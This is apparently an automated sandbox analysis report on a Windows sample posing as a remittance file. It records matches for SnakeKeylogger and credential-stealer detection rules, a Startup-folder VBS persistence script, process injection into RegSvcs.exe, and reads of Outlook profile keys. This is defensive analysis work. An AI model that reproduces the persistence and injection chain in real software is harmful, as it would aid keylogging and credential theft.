Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
Source: 00000007.00000002.4560074410.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
Source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_00431BE8 GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: String function: 00445AE0 appears 55 times
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: String function: 00445AE0 appears 55 times
Source: z84TTREMITTANCEUSD347_432_63.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.4560074410.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 2.2.name.exe.3b00000.1.raw.unpack, z.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, ---.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.name.exe.43c0000.1.raw.unpack, z.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW, 0_2_0044AF6C
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464EAE
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 6_2_004333BE
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 6_2_00464EAE
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D619
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle, 0_2_004755C4
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0047839D
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043305F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | File created: C:\Users\user\AppData\Local\directory
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | File created: C:\Users\user\AppData\Local\Temp\done
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Source: z84TTREMITTANCEUSD347_432_63.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | File read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: RegSvcs.exe, 00000003.00000002.4562656465.000000000287C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4562656465.0000000002870000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4562785704.000000000303A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | File read: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe
                  Source: unknown | Process created: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: wsock32.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: z84TTREMITTANCEUSD347_432_63.exe | Static file information: File size 1275767 > 1048576
                  Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2161626135.0000000004500000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2161311195.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353536379.0000000004460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353238654.0000000004600000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2161626135.0000000004500000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2161311195.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353536379.0000000004460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2353238654.0000000004600000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
                  Source: name.exe.0.dr | Static PE information: real checksum: 0xa961f should be: 0x139d49
                  Source: z84TTREMITTANCEUSD347_432_63.exe | Static PE information: real checksum: 0xa961f should be: 0x139d49
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02464A2D push eax; ret 3_2_02464962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_024648F8 push eax; ret 3_2_02464912
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02464968 push eax; ret 3_2_02464972
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02464978 push eax; ret 3_2_02464982
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0246891E pushad ; iretd 3_2_0246891F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02464988 push eax; ret 3_2_02464992
